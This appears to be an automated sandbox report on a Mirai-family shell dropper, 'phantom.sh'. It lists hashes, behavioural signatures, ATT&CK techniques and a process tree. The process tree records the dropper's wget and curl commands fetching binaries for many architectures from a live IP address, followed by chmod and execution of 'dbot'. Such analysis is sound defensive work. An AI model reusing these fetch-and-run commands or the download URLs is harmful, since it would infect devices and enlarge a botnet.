Analysis
-
max time kernel
149s -
max time network
159s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
23/03/2025, 02:52
General
-
Target
phantom.sh
-
Size
1KB
-
MD5
b25643d9ed071bba8af0ef060b5180bf
-
SHA1
12c13e5c16cabcd24f9c38b750acd5be92df73ec
-
SHA256
2e22b8d097eed40f8fd2c985b0a6fb31ed2f6ed8a022cc707ebbf9fc7be549cf
-
SHA512
5eac9707aa2c220394b2d2be4737451e8b1cba8fe86611656c3ac599ffc6c1b24f4a30e4a40122f57bda4a0ad7d5dc5862cdf779e7f481c7f396bd757fe016c9
Malware Config
Extracted
mirai
WICKED
Extracted
mirai
WICKED
Extracted
mirai
WICKED
Extracted
mirai
WICKED
Extracted
mirai
WICKED
Extracted
mirai
WICKED
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 11 IoCs
-
Modifies Watchdog functionality 1 TTPs 16 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates active TCP sockets 1 TTPs 8 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 64 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
-
Changes its process name 8 IoCs
-
Checks CPU configuration 1 TTPs 11 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads system network configuration 1 TTPs 8 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 23 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/phantom.sh/tmp/phantom.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/usr/bin/wgetwget http://157.245.211.199/bins/x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat x862⤵
-
-
/bin/chmodchmod +x dbot phantom.sh systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-8HxDd5 x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x dbot mips phantom.sh systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-8HxDd5 x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat mpsl2⤵
-
-
/bin/chmodchmod +x dbot mips mpsl phantom.sh systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-8HxDd5 x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/arm2⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/catcat arm2⤵
-
-
/bin/chmodchmod +x arm dbot mips mpsl phantom.sh systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-8HxDd5 x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm arm5 dbot mips mpsl phantom.sh systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-8HxDd5 x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/arm62⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm arm5 arm6 dbot mips mpsl phantom.sh systemd-private-324b758d0a5648c9b49661ab67cceb4d-systemd-timedated.service-8HxDd5 x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/arm72⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/spc2⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm arm5 arm6 arm7 dbot mips mpsl phantom.sh spc x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm arm5 arm6 arm7 dbot m68k mips mpsl phantom.sh spc x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm arm5 arm6 arm7 dbot m68k mips mpsl phantom.sh sh4 spc x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://157.245.211.199/bins/ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://157.245.211.199/bins/ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm arm5 arm6 arm7 dbot m68k mips mpsl phantom.sh ppc sh4 spc x862⤵
- File and Directory Permissions Modification
-
-
/tmp/dbot./dbot Payload2⤵
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
65KB
MD5c41a79699de953380428ae97410bb85f
SHA1747a2e1757455604ec6ab089eeec07744b71d79c
SHA256753c2a1eaa8b0212cd1f451ff250d96f46c0d035c02b6909aaf02018b7835ecf
SHA512c0f23806b1d470d24c77cd76e93e4981bf806a8c74cc38322448566976bc0412176847210a1c6bfa1448bff9ef5ba91ffd35bd1857ae80a5bb0448f386c7753c
-
Filesize
41KB
MD52b9ff651d116fd4220b9ef064edc87ed
SHA182a30aec3a92d6b9aa928c49c775bdc5c7f368a7
SHA256a683e1c24a8f520953bd275cd7a49788e1fe492c2a1f810a85c5275f0063250e
SHA512e5affabceca41f66b769c7d707e5040e7feaceab8fb45a2953f596c82641d30244030d7d2605a0765d6a29763502563be99a944fa7d993d483f35ec097fd92ea
-
Filesize
73KB
MD59b4a9ffc8981f7af2b338260b47f8ae7
SHA15558be7ec4a318c25c659764ebacdc9ca066fdcd
SHA256b76c2cbe3d2450fea49fd42f29c29bc18bced3ef0001f9ac10e057d3a590056d
SHA51280b23756ebaddf8104482a45473f5dedc31ca14ec4eeffab70677a4762b0e4c77350a33c53eac4d5282138e73c1b5f1db2574732c7acae3f098e5e580c7e4b1a
-
Filesize
140KB
MD5a4f6cf4e6edb03734e3fd5d250dfa63b
SHA11297b2b89a27d8c3615548099cd38cbab48dc406
SHA2565cc8e494a701a2f510cff13ec26bc59ef4c8f0812685a1ff7752a1c613f52f31
SHA5125e1828b4cf29b04a553895af4299a46d83de01f59142737b1a66d121047404636d7c38b4052319fc6c5d5be100af82d7c9c54f4c41f5aa80bc3d423e70e8eb78
-
Filesize
65KB
MD50a548e5e31b00bd078466d15eb16e546
SHA10203328ab86cda8492ca3ea86528c4272394e7e8
SHA2563235403721303e205a16197923af1e265a884bbf847e85334f4c9e1872cc21a3
SHA512fb5ceb1dd5786462a89d61e133b587fb5fdec8b638be3f7af288930bb74a600aaf0b8932f6765318a5a9948fd22e83e5ec4c392dd907e298159eddf6a3576cee
-
Filesize
82KB
MD57f3a7052000e43a7ea7b3831d3471c53
SHA1ea0f5ad61681af067cd5c8a6c1fe9f8df20e7fb0
SHA256740e42e867d99cdcdc6e3905156543ac4463f26a20a87cefa21907ffa926fd27
SHA512a93e9477a07d66ea950b8cceba5b9953fb9266606cee61ec8d8dbe854f276b0a8df85ae5f80fb738cb0f3a8f7c322e2953757e392443fba6b85adcd14c602e28
-
Filesize
82KB
MD5d10cde406bb6e741caa075ae3eb1b59b
SHA13b8761c325ff59e67ced6151d5c0b483e7009ff0
SHA25633aaa80f492242f0a5e3e8edec511d11b09910e21d044b7425f2b19c79885275
SHA512d475ae20989beac90cb6bd51b2a91536880af3c07c7a5e5de5210670ee0292e599871488659fbf99206aaf1e99e19b5344ef936a0a602abffdf62b4473edb48d
-
Filesize
59KB
MD51f0a0cf47d7afd1a4a8bb7ff114e4d0b
SHA10a471bebec32732da450e7424abf7f7dbd6bc94c
SHA256e060e305cce23869f5df383bde88659289d03d65697a048eb26e328f12fcc83b
SHA512f1cf1bc0a046aeb78cb95ecba69f1dcbaf2cad950016b3a4e4c331a6a243429ed4fec50ab3e8c995ec17d66218440a516257b4afc2fb03a424ea729010c22e80
-
Filesize
54KB
MD51aa4143ebcf26124be79600326fd0e38
SHA1b166ad38f3ee4faf5876417db28aa3ab1c211cff
SHA25621a3cd61d4c9043b38ac2d0afe218c89d7205855bfaa7f91a20f7872b9124e4b
SHA512dbe5e2027add1007806e7d500517d538c4b669c36778ba88acf4c376c1ffa33e7bce8cd6c1a33d147b5490d8ab342a0f77a15a111603faa508d0b827c86ccdd5
-
Filesize
65KB
MD519d915863ed88ad6cfbed0a9e91875b4
SHA12a162911ba6df6689052c4f4f215e2a509e875e6
SHA25683ea2fbf03f0177db78259a4eadda417ec881202c66bba84f3f0ee20ed098dba
SHA512b75deb4f8c8f59c8a079b41648d390758a2aa05e763d91e6c834d2344df6050779dcfa7040271f63970cd657d258e4f7294ce1888f0dcdd8b6d77d246447f60a
-
Filesize
56KB
MD5a7b4473399ce74c911ec86fe9f3a2295
SHA116ceb93a19944b099d8da7c0f42faa92954fd8e7
SHA2565064463e3dcdc501a0cd479dcb09b24bd3bd0bf7cbacac0341f09c85f7dce81e
SHA51232031eae5f5e33a5c5c3c2f97d69675e54ddc3b74f85016418d543ff2a806cf92f77ca5b5c1085e5691544ced62c1b05e4d56da01d62d0e07b5555d40d151125